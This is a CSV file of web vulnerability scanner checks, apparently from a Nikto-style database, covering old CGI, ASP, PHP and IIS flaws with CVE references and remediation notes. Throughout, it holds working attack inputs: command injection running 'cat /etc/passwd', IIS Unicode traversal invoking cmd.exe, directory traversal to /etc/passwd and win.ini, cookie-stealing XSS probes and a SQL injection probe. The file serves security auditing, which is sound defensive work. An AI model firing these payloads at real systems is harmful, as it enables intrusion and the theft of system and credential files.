"003109","CVE-2002-0612","7","@CGIDIRSFileSeek.cgi?head=;cat%20/etc/passwd|&foot=","GET","root:","","","","","FileSeek allows arbitrary command execution. Update to the latest version from cgi-perl.com","","" "003110","OSVDB-3588","7","@CGIDIRSFileSeek2.cgi?head=&foot=;cat%20/etc/passwd","GET","root:","","","","","FileSeek allows arbitrary command execution. Update to the latest version from cgi-perl.com","","" "003111","OSVDB-3588","7","@CGIDIRSFileSeek2.cgi?head=;cat%20/etc/passwd|&foot=","GET","root:","","","","","FileSeek allows arbitrary command execution. Update to the latest version from cgi-perl.com","","" "003112","CVE-2002-0611","7","@CGIDIRSFileSeek.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd","GET","root:","","","","","FileSeek allows arbitrary files to be retrieved. Update to the latest version from cgi-perl.com","","" "003113","CVE-2002-0611","7","@CGIDIRSFileSeek.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=","GET","root:","","","","","FileSeek allows arbitrary files to be retrieved. Update to the latest version from cgi-perl.com","","" "003114","OSVDB-3590","7","@CGIDIRSFileSeek2.cgi?head=&foot=....//....//....//....//....//....//....//etc/passwd","GET","root:","","","","","FileSeek allows arbitrary files to be retrieved. Update to the latest version from cgi-perl.com","","" "003115","OSVDB-3590","7","@CGIDIRSFileSeek2.cgi?head=....//....//....//....//....//....//....//etc/passwd&foot=","GET","root:","","","","","FileSeek allows arbitrary files to be retrieved. Update to the latest version from cgi-perl.com","","" "003116","CVE-2002-1428","b","/project/index.php?m=projects&user_cookie=1","GET","200","","","","","dotProject 0.2.1.5 may allow admin login bypass by adding the user_cookie=1 to the URL.","","" "003117","OSVDB-3632","4","/webcalendar/colors.php?color=</script><script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XSS).","","" "003118","OSVDB-3633","4","/webcalendar/week.php?user=\"><script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XSS).","","" "003119","CVE-2000-0642","3","/active.log","GET","WEBactive Http Server","","","","","The WebActive log is accessible remotely.","","" "003120","OSVDB-3761","7","/?pattern=/etc/*&sort=name","GET","passwd","","hosts","","","The TCLHttpd 3.4.2 server allows directory listings via dirlist.tcl.","","" "003121","OSVDB-3761","7","/images/?pattern=/etc/*&sort=name","GET","passwd","","hosts","","","The TCLHttpd 3.4.2 server allows directory listings via dirlist.tcl.","","" "003122","OSVDB-3762","4","/debug/dbg?host==<script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\);<\/script>","","","","","The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts.","","" "003123","OSVDB-3762","4","/debug/echo?name=<script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\);<\/script>","","","","","The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts.","","" "003124","OSVDB-3762","4","/debug/errorInfo?title===<script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\);<\/script>","","","","","The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts.","","" "003125","OSVDB-3762","4","/debug/showproc?proc===<script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\);<\/script>","","","","","The TCLHttpd 3.4.2 server is vulnerable to Cross Site Scripting (XSS) in debug scripts.","","" "003126","CVE-2000-0628","8","/site/eg/source.asp","GET","200","","","","","This ASP (installed with Apache::ASP) allows attackers to upload files to the server. Upgrade to 1.95 or higher.","","" "003127","CVE-2004-0129","7","@PHPMYADMINexport.php?what=../../../../../../../../../../../../etc/passwd%00","GET","root:","","","","","phpMyAdmin is vulnerable to a directory traversal attack.","","" "003128","http://httpd.apache.org/docs/2.4/mod/mod_userdir.html","2","/~nobody/etc/passwd","GET","root:","","","","","Apache is misconfigured to view files by accessing ~nobody/filename. Change UserDir from './' to something else in httpd.conf.","","" "003129","https://seclists.org/bugtraq/2003/Jul/39","3","/admin/db.php","POST","e107 sql-dump","","","","","The e107 Website Management System allows the remote SQL database to be dumped to the user, and it may contained hashed passwords. BID-8273.","dump_sql=foo","" "003130","https://seclists.org/bugtraq/2003/Jul/39","3","/admin/db.php?dump_sql=1","GET","e107 sql-dump","","","","","e107 allows a dump of the MySQL database without authentication.","","" "003131","CVE-2001-0437","7","/dcforum/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This install of DCForum allows attackers to read arbitrary files on the host.","","" "003132","CVE-2001-0437","7","@CGIDIRSdcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This install of DCForum allows attackers to read arbitrary files on the host.","","" "003133","CVE-2000-0664","3","/%00/","GET","Directory listing of","","","","","Remote directories can be retrieved through Roxen, upgrade the server.","","" "003134","CVE-1999-0449","6","/iissamples/exair/search/advsearch.asp","GET","200","","","","","Scripts within the Exair package on IIS 4 can be used for a DoS against the server.","","" "003135","CVE-2002-1264","2bd","/isqlplus","GET","200","","","","","Oracle iSQL*Plus is installed. This may be vulnerable to a buffer overflow in the user ID field.","","" "003136","CVE-2002-2057","2","/data/member_log.txt","GET","200","","","","","Teekai's forum full 1.2 member's log can be retrieved remotely.","","" "003137","CVE-2002-2058","2","/data/userlog/log.txt","GET","200","","","","","Teekai's Tracking Online 1.0 log can be retrieved remotely.","","" "003138","CVE-2002-2058","2","/userlog.php","GET","200","","","","","Teekai's Tracking Online 1.0 log can be retrieved remotely.","","" "003139","CVE-2003-0312","7","/internal.sws?../../../../../../../../winnt/win.ini","GET","\[fonts\]","","","","","Snowblind Web Server v1.0 allows arbitrary files to be retrieved from the remote server.","","" "003140","CVE-2003-0312","7","/internal.sws?../../../../../../../../winnt/win.ini","GET","\[windows\]","","","","","Snowblind Web Server v1.0 allows arbitrary files to be retrieved from the remote server.","","" "003141","CVE-2003-0313","7","/internal.sws?.../.../.../.../.../.../.../.../winnt/win.ini","GET","\[fonts\]","","","","","Snowblind Web Server v1.0 allows arbitrary files to be retrieved from the remote server.","","" "003142","CVE-2003-0313","7","/internal.sws?.../.../.../.../.../.../.../.../winnt/win.ini","GET","\[windows\]","","","","","Snowblind Web Server v1.0 allows arbitrary files to be retrieved from the remote server.","","" "003143","CVE-2002-0943 https://packetstormsecurity.com/files/32406/xmas.txt.html","2","/ASP/cart/database/metacart.mdb","GET","200","","","","","MetaCart2 is an ASP shopping cart. The database of customers is available via the web.","","" "003144","CVE-2002-0943 https://packetstormsecurity.com/files/32406/xmas.txt.html","2","/database/metacart.mdb","GET","200","","","","","MetaCart2 is an ASP shopping cart. The database of customers is available via the web.","","" "003145","CVE-2002-0943 https://packetstormsecurity.com/files/32406/xmas.txt.html","2","/mcartfree/database/metacart.mdb","GET","200","","","","","MetaCart2 is an ASP shopping cart. The database of customers is available via the web.","","" "003146","CVE-2002-0943 https://packetstormsecurity.com/files/32406/xmas.txt.html","2","/metacart/database/metacart.mdb","GET","200","","","","","MetaCart2 is an ASP shopping cart. The database of customers is available via the web.","","" "003147","CVE-2002-0943 https://packetstormsecurity.com/files/32406/xmas.txt.html","2","/shop/database/metacart.mdb","GET","200","","","","","MetaCart2 is an ASP shopping cart. The database of customers is available via the web.","","" "003148","CVE-2002-0943 https://packetstormsecurity.com/files/32406/xmas.txt.html","2","/shoponline/fpdb/shop.mdb","GET","200","","","","","MetaCart2 is an ASP shopping cart. The database of customers is available via the web.","","" "003149","CVE-2002-0943 https://packetstormsecurity.com/files/32406/xmas.txt.html","2","/shopping/database/metacart.mdb","GET","200","","","","","MetaCart2 is an ASP shopping cart. The database of customers is available via the web.","","" "003150","http://phpay.sourceforge.net/ https://seclists.org/bugtraq/2003/Apr/138","4","/search.php?sess=your_session_id&lookfor=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","phPay v2.02 cross site scripting.","","" "003151","https://vulners.com/osvdb/OSVDB:35877","3","/admin/phpinfo.php","GET","PHP Version","","","","","Immobilier allows phpinfo() to be run.","","" "003152","http://phpay.sourceforge.net/ https://seclists.org/bugtraq/2003/Apr/138","3","/start.php?config=alper.inc.php","GET","Failed opening required","","","","","phPay v2.02 information disclosure.","","" "003153","https://seclists.org/bugtraq/2003/Apr/138","3","/login.php?sess=your_session_id&abt=&new_lang=99999&caller=navlang","GET","Failed opening required","","","","","phPay v2.02 information disclosure.","","" "003154","https://seclists.org/fulldisclosure/2004/Nov/1116","7","/viewimg.php?path=../../../../../../../../../../etc/passwd&form=1&var=1","GET","root:","","","","","KorWebLog allows any file to be read on the system.","","" "003155","CVE-2002-0360","d","@CGIDIRSgettransbitmap","GET","200","","","","","Sun Answerbook2 is vulnerable to a buffer overflow in the gettransbitmap CGI. All default CGIs should be disabled or removed, and Answerbook2 should be disabled if not being used.","","" "003156","OSVDB-4220","8","@CGIDIRSguestbook.cgi?user=cpanel&template=|/bin/cat%20/etc/passwd|","GET","root:","","","","","cpanel's guestbook.cgi allows any command to be executed on the remote server. Remove /usr/local/cpanel/cgi-sys/guestbook.cgi or update to a new version of cpanel.","","" "003157","OSVDB-4231","3","/JUNK(5).xml","GET","file:","","","file:hover","","Coccoon from Apache-XML project reveals file system path in error messages.","","" "003158","OSVDB-4231","3","/JUNK(5)/","GET","FileNotFoundException: \/","","","","","Coccoon 2.1.4 from Apache-XML project reveals file system path in error messages.","","" "003159","OSVDB-4233","1","/cgi-bin/main_menu.pl","GET","NetDetector Traffic Analysis","","","","","The NetDetector allows unauthenticated users to perform database queries.","","" "003160","OSVDB-4237","2","/ban.bak","GET","200","","","","","Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.","","" "003161","OSVDB-4237","2","/ban.dat","GET","200","","","","","Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.","","" "003162","OSVDB-4237","2","/ban.log","GET","200","","","","","Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.","","" "003163","OSVDB-4237","2","/banmat.pwd","GET","200","","","","","Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.","","" "003164","CVE-2002-0579","2","/admin/adminproc.asp","GET","200","","","","","Xpede administration page may be available. The /admin directory should be protected.","","" "003165","CVE-2002-0579","2","/admin/datasource.asp","GET","200","","","","","Xpede page reveals SQL account name. The /admin directory should be protected.","","" "003166","CVE-2002-0579","9","/utils/sprc.asp","GET","200","","","","","Xpede page may allow SQL injection.","","" "003167","CVE-2002-0579","2","/reports/temp/","GET","[Ii]ndex [Oo]f /","[Dd]irectory [Ll]isting ([Oo]f|[Ff]or)","","","","Xpede reports directory should not be browsable.","","" "003168","OSVDB-4245","3","@CGIDIRSrtm.log","GET","HttpPost Retry","","","","","Rich Media's JustAddCommerce allows retrieval of a log file, which may contain sensitive information.","","" "003169","CVE-2002-0236","3","@CGIDIRSVsSetCookie.exe?","GET","200","","","","","A flaw in VsSetCookie.exe may allow attackers to guess a correct user name & gain access to the Lucent system.","","" "003170","CVE-2002-1131","4","/addressbook.php?\"><script>alert(Vulnerable)</script><!--","GET","<script>alert\(Vulnerable\)<\/script>","","","","","Squirrel Mail 1.2.7 is vulnerable to Cross Site Scripting (XSS).","","" "003171","CVE-2002-1131","4","/options.php?optpage=<script>alert('Vulnerable!')</script>","GET","include_path","","","","","This Squirrel Mail 1.2.7 reveals the PHP path information in error messages.","","" "003172","CVE-2002-1131","4","/search.php?mailbox=INBOX&what=x&where=<script>alert('Vulnerable!')</script>&submit=Search","GET","include_path","","","","","This Squirrel Mail 1.2.7 reveals the PHP path information in error messages.","","" "003173","CVE-2002-1131","4","/help.php?chapter=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Squirrel Mail 1.2.7 is vulnerable to Cross Site Scripting (XSS).","","" "003174","CVE-2002-1341","4","/src/read_body.php?mailbox=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&passed_id=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&startMessage=1&show_more=0","GET","<script>alert\(Vulnerable\)<\/script>","","","","","Squirrel Mail is vulnerable to Cross Site Scripting (XSS).","","" "003175","CVE-2001-1138","7","@CGIDIRSpowerup/r.cgi?FILE=../../../../../../../../../../etc/passwd","GET","root:","","","","","The Powerup CGI allows attackers to read any file on the system.","","" "003176","CVE-2001-1138","7","@CGIDIRSr.cgi?FILE=../../../../../../../../../../etc/passwd","GET","root:","","","","","The Powerup CGI allows attackers to read any file on the system.","","" "003177","https://seclists.org/bugtraq/2002/Feb/250","d","@CGIDIRSWebnews.exe","GET","200","","","","","Some versions of WebNews are vulnerable to a buffer overflow.","","" "003178","CVE-2002-0310 BID-4156","a","@CGIDIRSwebnews.pl","GET","200","","","","","WebNews may contain some default users in the binary: testweb/newstest, alwn3845/imaptest, alwi3845/wtest3452, testweb2/wtest4879","","" "003179","CVE-2001-1144","7","/.../.../.../","GET","Last Modified","","","","","The myCIO server allows directory traversal.","","" "003180","CVE-2002-0266","3","@CGIDIRStexis.exe/junk","GET","Web Script","","","","","Texis Web Script gives system path/information when an invalid file is requested.","","" "003181","CVE-2002-0266","3","@CGIDIRStexis/junk","GET","Web Script","","","","","Texis Web Script gives system path/information when an invalid file is requested.","","" "003182","OSVDB-4314","3","/texis.exe/?-dump","GET","200","","","","","Texis installation may reveal sensitive information.","","" "003183","OSVDB-4314","3","/texis.exe/?-version","GET","200","","","","","Texis installation may reveal sensitive information.","","" "003184","CVE-2000-0975","7","@CGIDIRSapexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/","GET","root:","","","","","Anaconda Foundation Directory allows attackers to read arbitrary files from the server.","","" "003185","OSVDB-4356","4","/acart2_0/deliver.asp?msg=<script>alert(\"test\")</script>","GET","<script>alert\(\"test\"\)<\/script>","","","","","Alan Ward A-Cart 2.0 contains several XSS vulnerabilities","","" "003186","OSVDB-4357","4","/acart2_0/error.asp?msg=<script>alert(\"test\")</script>","GET","<script>alert\(\"test\"\)<\/script>","","","","","Alan Ward A-Cart 2.0 contains several XSS vulnerabilities","","" "003187","OSVDB-4358","4","/acart2_0/admin/error.asp?msg=<script>alert(\"test\")</script>","GET","<script>alert\(\"test\"\)<\/script>","","","","","Alan Ward A-Cart 2.0 contains several XSS vulnerabilities","","" "003188","OSVDB-4359","4","/acart2_0/admin/index.asp?msg=<script>alert(\"test\")</script>","GET","<script>alert\(\"test\"\)<\/script>","","","","","Alan Ward A-Cart 2.0 contains several XSS vulnerabilities","","" "003189","CVE-2000-0884 MS00-078","7","@CGIDIRSsensepost.exe?/c+dir","GET","200","","","","","The presence of sensepost.exe indicates the system is/was vulnerable to a Unicode flaw and was compromised with a test script from SensePost. The sensepost.exe allows command execution (it is a copy of cmd.exe), as did the original unicode exploit.","","" "003190","CVE-2000-0884 MS00-078","8","/certsrv/..%c0%af../winnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS Unicode command exec","","" "003191","CVE-2000-0884 MS00-078","8","/cgi-bin/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS Unicode command exec","","" "003192","CVE-2000-0884 MS00-078","8","/iisadmpwd/..%c0%af../winnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS Unicode command exec","","" "003193","CVE-2000-0884 MS00-078","8","/msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS Unicode command exec","","" "003194","CVE-2000-0884 MS00-078","8","/pbserver/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS Unicode command exec","","" "003195","CVE-2000-0884 MS00-078","8","/rpc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS Unicode command exec","","" "003196","CVE-2000-0884 MS00-078","8","/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS Unicode command exec","","" "003197","CVE-2000-0884 MS00-078","8","/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS Unicode command exec","","" "003198","CVE-2000-0884 MS00-078","8","/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\"","GET","boot\.ini","","","","","IIS Unicode command exec","","" "003199","CVE-2000-0884 MS00-078","8","/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS Unicode command exec","","" "003200","CVE-2006-2948","2","/acart2_0/acart2_0.mdb","GET","200","","","","","Alan Ward A-Cart 2.0 allows remote user to read customer database file which may contain usernames, passwords, credit cards and more.","","" "003201","CVE-2004-1873","2","/acart2_0/admin/category.asp?catcode='","GET","200","","","","","Alan Ward A-Cart 2.0 is vulnerable to a SQL inject attack.","","" "003202","CVE-1999-0737,MS99-013","7","/Sites/Knowledge/Membership/Inspired/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine.","","" "003203","CVE-1999-0737,MS99-013","7","/Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine.","","" "003204","CVE-1999-0737,MS99-013","7","/Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine.","","" "003205","CVE-1999-0737,MS99-013","7","/Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine.","","" "003206","CVE-1999-0737,MS99-013","7","/Sites/Samples/Knowledge/Push/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine.","","" "003207","CVE-1999-0737,MS99-013","7","/Sites/Samples/Knowledge/Search/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine.","","" "003208","CVE-1999-0737,MS99-013","7","/SiteServer/Publishing/ViewCode.asp","GET","200","","","","","The default ViewCode.asp can allow an attacker to read any file on the machine.","","" "003209","OSVDB-17671","37","/siteserver/publishing/viewcode.asp?source=/default.asp","GET","200","","","","","May be able to view source code using Site Server vulnerability.","","" "003210","OSVDB-4775","7","/shoutbox.php?conf=../../../../../../../etc/passwd","GET","root:","","","","","Webfroot Shoutbox 2.32 and below allows any file to be read from the system.","","" "003211","CVE-2002-0385","d","/securelogin/1,2345,A,00.html","GET","200","","","","","Vignette Story Server v4.1, 6, may disclose sensitive information via a buffer overflow.","","" "003212","OSVDB-4927","7","/.%252e/.%252e/.%252e/winnt/boot.ini","GET","boot loader","","","","","JWalk Web server allows any file to be retrieved from the remote system.","","" "003213","OSVDB-4928","3","/add.php","GET","Failed opening '","","","","","Ultimate PHP Board (UPB) final beta 1.0 reveals file system paths in add.php error messages.","","" "003214","CVE-2001-1044","3","/class/mysql.class","GET","This program is free software","","","","","Basilix allows its configuration files to be downloaded, which may include the mysql auth credentials.","","" "003215","CVE-2001-1044","3","/inc/sendmail.inc","GET","This program is free software","","","","","Basilix allows its configuration files to be downloaded, which may include the mysql auth credentials.","","" "003216","OSVDB-5089","8","/admin/system.php3?cmd=cat%20/etc/passwd","GET","root:","","","","","DotBr 0.1 allows remote command execution.","","" "003217","OSVDB-5089","8","/admin/system.php3?cmd=dir%20c:\\","GET","boot\.ini","","","","","DotBr 0.1 allows remote command execution.","","" "003218","OSVDB-5090","8","/admin/exec.php3?cmd=cat%20/etc/passwd","GET","root:","","","","","DotBr 0.1 allows remote command execution.","","" "003219","OSVDB-5090","8","/admin/exec.php3?cmd=dir%20c:\\","GET","boot\.ini","","","","","DotBr 0.1 allows remote command execution.","","" "003220","OSVDB-5091","3","/foo.php3","GET","PHP Version","","","","","DotBr 0.1 has a phpinfo() script called foo.php3.","","" "003221","OSVDB-5092","3","/config.inc","GET","200","","","","","DotBr 0.1 configuration file includes usernames and passwords.","","" "003222","CVE-2003-1284","3","@CGIDIRSenviron.pl","GET","REMOTE_ADDR","","","","","Sambar Server default script reveals environment information","","" "003223","CVE-2003-1284","3","@CGIDIRStestcgi.exe","GET","REMOTE_ADDR","","","","","Sambar Server default script reveals environment information","","" "003224","https://seclists.org/fulldisclosure/2003/Mar/265","3","/sysuser/docmgr/ieedit.stm?url=../","GET","200","","","","","Sambar default file may allow directory listings.","","" "003225","https://seclists.org/fulldisclosure/2003/Mar/265","3","/sysuser/docmgr/iecreate.stm?template=../","GET","200","","","","","Sambar default file may allow directory listings.","","" "003226","https://seclists.org/fulldisclosure/2003/Mar/265","4","/wwwping/index.stm?wwwsite=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "003227","https://seclists.org/fulldisclosure/2003/Mar/265","4","/sysuser/docmgr/create.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "003228","https://seclists.org/fulldisclosure/2003/Mar/265","4","/sysuser/docmgr/edit.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "003229","https://seclists.org/fulldisclosure/2003/Mar/265","4","/sysuser/docmgr/ftp.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "003230","https://seclists.org/fulldisclosure/2003/Mar/265","4","/sysuser/docmgr/htaccess.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "003231","https://seclists.org/fulldisclosure/2003/Mar/265","4","/sysuser/docmgr/iecreate.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "003232","https://seclists.org/fulldisclosure/2003/Mar/265","4","/sysuser/docmgr/ieedit.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "003233","https://seclists.org/fulldisclosure/2003/Mar/265","4","/sysuser/docmgr/info.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "003234","https://seclists.org/fulldisclosure/2003/Mar/265","4","/sysuser/docmgr/mkdir.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "003235","https://seclists.org/fulldisclosure/2003/Mar/265","4","/sysuser/docmgr/rename.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "003236","https://seclists.org/fulldisclosure/2003/Mar/265","4","/sysuser/docmgr/search.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "003237","https://seclists.org/fulldisclosure/2003/Mar/265","4","/sysuser/docmgr/sendmail.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "003238","https://seclists.org/fulldisclosure/2003/Mar/265","4","/sysuser/docmgr/template.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "003239","https://seclists.org/fulldisclosure/2003/Mar/265","4","/sysuser/docmgr/update.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "003240","https://seclists.org/fulldisclosure/2003/Mar/265","4","/sysuser/docmgr/vccheckin.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "003241","https://seclists.org/fulldisclosure/2003/Mar/265","4","/sysuser/docmgr/vccreate.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "003242","https://seclists.org/fulldisclosure/2003/Mar/265","4","/sysuser/docmgr/vchist.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "003243","https://seclists.org/fulldisclosure/2003/Mar/265","4","/sysuser/docmgr/edit.stm?name=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "003244","https://seclists.org/fulldisclosure/2003/Mar/265","4","/sysuser/docmgr/ieedit.stm?name=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "003245","https://seclists.org/fulldisclosure/2003/Mar/265","4","/sysuser/docmgr/info.stm?name=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "003246","https://seclists.org/fulldisclosure/2003/Mar/265","4","/sysuser/docmgr/rename.stm?name=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "003247","https://seclists.org/fulldisclosure/2003/Mar/265","4","/sysuser/docmgr/sendmail.stm?name=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "003248","https://seclists.org/fulldisclosure/2003/Mar/265","4","/sysuser/docmgr/update.stm?name=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "003249","https://seclists.org/fulldisclosure/2003/Mar/265","4","/sysuser/docmgr/vccheckin.stm?name=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "003250","https://seclists.org/fulldisclosure/2003/Mar/265","4","/sysuser/docmgr/vccreate.stm?name=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "003251","https://seclists.org/fulldisclosure/2003/Mar/265","4","/sysuser/docmgr/vchist.stm?name=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "003252","https://seclists.org/fulldisclosure/2003/Mar/265","4","@CGIDIRStestcgi.exe?<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "003253","https://seclists.org/fulldisclosure/2003/Mar/265","4","@CGIDIRSenviron.pl?param1=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "003254","https://seclists.org/fulldisclosure/2003/Mar/265","4","/syshelp/stmex.stm?foo=123&bar=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "003255","https://seclists.org/fulldisclosure/2003/Mar/265","4","/syshelp/stmex.stm?foo=<script>alert(document.cookie)</script>&bar=456","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "003256","https://seclists.org/fulldisclosure/2003/Mar/265","4","/syshelp/cscript/showfunc.stm?func=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "003257","https://seclists.org/fulldisclosure/2003/Mar/265","4","/syshelp/cscript/showfncs.stm?pkg=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "003258","https://seclists.org/fulldisclosure/2003/Mar/265","4","/syshelp/cscript/showfnc.stm?pkg=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "003259","https://seclists.org/fulldisclosure/2003/Mar/265","4","/netutils/ipdata.stm?ipaddr=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "003260","https://seclists.org/fulldisclosure/2003/Mar/265","4","/netutils/findata.stm?host=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" "003261","https://seclists.org/fulldisclosure/2003/Mar/265","4","/netutils/findata.stm?user=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS).","","" 